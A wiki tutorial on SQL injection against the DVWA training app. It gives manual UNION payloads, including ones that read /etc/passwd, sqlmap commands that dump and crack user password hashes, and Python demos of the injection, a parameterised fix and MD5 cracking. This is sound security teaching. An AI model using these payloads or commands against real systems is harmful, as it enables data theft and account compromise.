SQLMap: Example SQL Injection against DVWA
Onnowpurbo (talk | contribs)
Latest revision as of 05:56, 4 March 2017
Source: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/
Background
Before using SQLMAP it is very useful to first check by hand whether injection is possible. SQLMAP is only a tool; we should understand the process manually, because everything SQLMAP does can also be done by hand.
Manual process to test the vulnerability
In DVWA
Original query
SELECT first_name, last_name FROM users WHERE user_ID = '$id'
Exploited query (the injected id closes the string literal, appends a UNION, and comments out the trailing quote)
SELECT first_name, last_name FROM users WHERE user_ID = '' union select user, password from dvwa.users -- '
Check whether the site is vulnerable
1' or '2'='2
We need to find how many columns the original query returns: add one column at a time to the UNION until the database stops complaining, and note that it errors again as soon as we add one too many.
' and 1=1 union select 1,2 #
' and 1=1 union select 1,2,3 #
This shows that the query returns only 2 columns (the users table itself has more, as the sqlmap --columns output further down shows), so every injected SELECT must also return exactly 2 values.
Now let's do the injection.
' union SELECT 1, user() -- '
' and 1=1 union select database(),version() #
' union SELECT 1, user() #
' and 1=1 union select null,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='dvwa' #
' and 1=1 union select first_name,password from dvwa.users #
' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' #
' union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'user_id' #
' union select user, password FROM users #
' union SELECT 1, load_file('/etc/hosts') #
' union SELECT 1, load_file('/etc/passwd') #
The 1,2,3 attempt fails because the result set has only 2 columns, which is why every payload above selects exactly two values (padding with a constant such as 1 or null where only one value is wanted). The two load_file() payloads only return data if the MySQL account has the FILE privilege and the file is readable by the database server process.
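The manual steps above (the quote-based vulnerability check, counting the columns with UNION SELECT 1,2 / 1,2,3, and the final UNION that pulls user and password) as one runnable, added example. This is not DVWA's code or the page's own code: it rebuilds a small copy of the dvwa.users table in an in-memory SQLite database (a constructed stand-in, avatar column omitted, same hashes as the dump on this page) and puts the DVWA 'low' string-concatenated query next to a parameterised version so the difference in behaviour is visible. SQLite accepts the `-- ` comment but not MySQL's `#`, so the payloads use `-- `.

```python
import sqlite3

# Constructed stand-in for the dvwa.users table shown on this page (same
# columns minus avatar, same hashes). Example data, not part of DVWA.
USERS = [
    (1, "admin",   "admin",  "admin",   "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "Gordon", "Brown",   "e99a18c428cb38d5f260853678922e03"),
    (3, "1337",    "Hack",   "Me",      "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "pablo",   "Pablo",  "Picasso", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "smithy",  "Bob",    "Smith",   "5f4dcc3b5aa765d61d8327deb882cf99"),
]


def make_db():
    """Create the in-memory users table and load the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", USERS)
    return con


def lookup_vulnerable(con, user_id):
    # DVWA 'low' pattern: the request parameter is pasted into the SQL text,
    # so a quote in the input ends the string literal and the remainder of
    # the input is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, user_id):
    # Parameterised query: the value is bound as data and never parsed as SQL,
    # so "1' or '2'='2" is simply a user_id that matches nothing.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


def count_columns(con, max_cols=8):
    # The manual step from the page: try UNION SELECT 1, then 1,2, then 1,2,3.
    # The database rejects every attempt whose column count differs from the
    # original SELECT, so the first count that does not error is the answer.
    for n in range(1, max_cols + 1):
        cols = ", ".join(str(i) for i in range(1, n + 1))
        try:
            lookup_vulnerable(con, f"' and 1=1 union select {cols} -- ")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_credentials(con):
    # The page's 'exploited query': close the string, UNION in the two columns
    # we actually want, and comment out the dangling quote. The WHERE clause
    # matches nothing, so only the UNIONed rows come back.
    rows = lookup_vulnerable(con, "' union select user, password from users -- ")
    return sorted(rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id:", lookup_vulnerable(db, "1"))
    print("vulnerable, 1' or '2'='2:", lookup_vulnerable(db, "1' or '2'='2"))
    print("safe, 1' or '2'='2:", lookup_safe(db, "1' or '2'='2"))
    print("columns in original SELECT:", count_columns(db))
    for user, pw_hash in dump_credentials(db):
        print(f"{user}: {pw_hash}")
```

Running it shows the tautology payload returning every row through the vulnerable function and nothing through the parameterised one, the column probe settling on 2, and the UNION payload returning the five user/hash pairs that sqlmap later dumps.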
Using SQLMAP
Parameters we use and their meaning
-u              target URL
--cookie        sends / emulates a Cookie header
To obtain the cookie we need to capture it, for example with the Firefox add-on Tamper Data. Example:
Cookie: security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
The PHPSESSID must belong to a logged-in DVWA session; otherwise DVWA redirects every request to the login page and sqlmap finds nothing to inject. The security=low cookie selects DVWA's unprotected version of the page.
--dbs           lists the databases if the injection succeeds
-D              selects the database to attack
--tables        lists the tables of the database given with -D
-T              selects a table within that database
--columns       lists the columns of the table given with -T
--current-user  shows the DBMS user the queries run as
--users         lists all DBMS users
--passwords     dumps the password hashes of the DBMS users
Example execution
List the available databases
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs
Result:
[07:02:08] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] mediawiki
[*] moodle
[*] mysql
[*] performance_schema
[*] snort
List the tables in the dvwa database
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables
Result:
[07:08:39] [INFO] fetching tables for database: 'dvwa'
[07:08:39] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
Check the column layout of the users table
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns
Result:
[07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa'
[07:11:51] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+
Dump the passwords
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump
--dump also tries to crack any password hashes it recognises in the dumped data (here unsalted MD5, varchar(32)). You will be asked whether to use the dictionary bundled with SQLMAP or your own.
Result:
[07:15:16] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[07:15:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:15:30] [INFO] starting 2 processes
[07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[07:16:00] [INFO] postprocessing table dump
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                          | password                                    | last_name | first_name |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
With that we have the passwords of every account in the dvwa.users table :) These are the web application's users, not the MySQL accounts; for those use --users and --passwords. Note that admin and smithy show the same hash: the passwords are unsalted MD5, so anyone with the dump can see password reuse even before cracking, and one dictionary hit recovers both accounts at once.
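What the --dump cracking step does, as an added example that is not sqlmap's code and not from the original page: the five hashes are exactly the ones in the dump above, while the wordlist and the suffix list are constructed stand-ins for sqlmap's wordlist.zip and its "common password suffixes" option (sqlmap's real lists are much longer and differ from these). The example precomputes the MD5 of every word+suffix candidate once and then looks every dumped hash up in that table, which is why unsalted hashes are cheap to attack in bulk; it also reports which accounts share a hash.

```python
import hashlib

# Hashes exactly as they appear in the sqlmap dump on this page (unsalted MD5).
DUMPED = {
    "admin":   "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337":    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo":   "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy":  "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed mini wordlist standing in for sqlmap's wordlist.zip (assumption).
WORDLIST = ["123456", "password", "letmein", "charley", "qwerty", "abc123", "dvwa"]
# Illustrative suffixes; sqlmap's own suffix list is different and longer.
SUFFIXES = ["", "1", "123", "!", "2017"]


def md5_hex(text):
    """Unsalted MD5 of a string, hex encoded, as stored in dvwa.users."""
    return hashlib.md5(text.encode()).hexdigest()


def build_table(wordlist, suffixes):
    # hash -> candidate. With no salt the table is built once and reused for
    # every dumped hash, so the cost does not grow with the number of users.
    table = {}
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            table[md5_hex(candidate)] = candidate
    return table


def crack(dumped, wordlist=WORDLIST, suffixes=SUFFIXES):
    """Map each user to the recovered password, or None if not in the table."""
    table = build_table(wordlist, suffixes)
    return {user: table.get(pw_hash) for user, pw_hash in dumped.items()}


def shared_hashes(dumped):
    # Identical passwords give identical unsalted hashes, so reuse between
    # accounts is visible in the dump without cracking anything.
    by_hash = {}
    for user, pw_hash in dumped.items():
        by_hash.setdefault(pw_hash, []).append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    for user, password in crack(DUMPED).items():
        print(f"{user}: {password}")
    for pw_hash, users in shared_hashes(DUMPED).items():
        print(f"hash {pw_hash} shared by {', '.join(users)}")
```

Against the page's dump this recovers all five passwords from a seven-word list, and flags admin and smithy as sharing a hash. The same lookup would fail against per-user salted hashes (bcrypt, scrypt, Argon2), because each stored value would then need its own candidate table.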